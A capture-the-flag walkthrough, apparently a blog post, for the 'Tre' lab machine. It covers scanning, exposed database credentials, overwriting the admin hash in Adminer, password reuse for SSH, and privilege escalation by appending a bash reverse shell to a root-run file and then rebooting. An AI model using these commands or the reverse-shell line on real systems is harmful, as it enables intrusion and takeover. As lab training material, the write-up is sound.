Tre Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.18 -vv

We have port 80 open so we scan it with dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt

I took a look around the result and i found a login  page which is /mantis but then no credentials to login with but we have another page http://192.168.1.18/mantisbt/config/a.txt , where we can find the username, password and database, so the next thing to do is to look for php pages with dirb -X and i found http://192.168.1.18/adminer.php where we can login with the previous credentials we found:

We login and look for usernames and passwords:

Now there is no need to crack the hash for the administrator because we can just change it, go to any site online were you can decrypt to MD5 and choose any password of your own and decrypt it, then change this one here, in my case the password is pass123:

Save and we go back to the login page at http://192.168.1.18/mantisbt and login:

Wow at this point i found nothing, so i went back to the database and i kept trying to login with ssh till i got a hit logging with tre@192.168.1.18 and the passwod is his realname Tr3@123456A! so all we nedded is to login to the databse and use his realname as password, and no need to continuse to the Mantis loging page:

The user can run sudo on this machine:

So i ran the LinEnum.sh script and i found this:

I edited the file and just added  bash -i >& /dev/tcp/192.168.1.16/4444 0>&1

Then ran sudo -u root /sbin/shutdown -r and while that i have a listening port 4444 on my machine:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s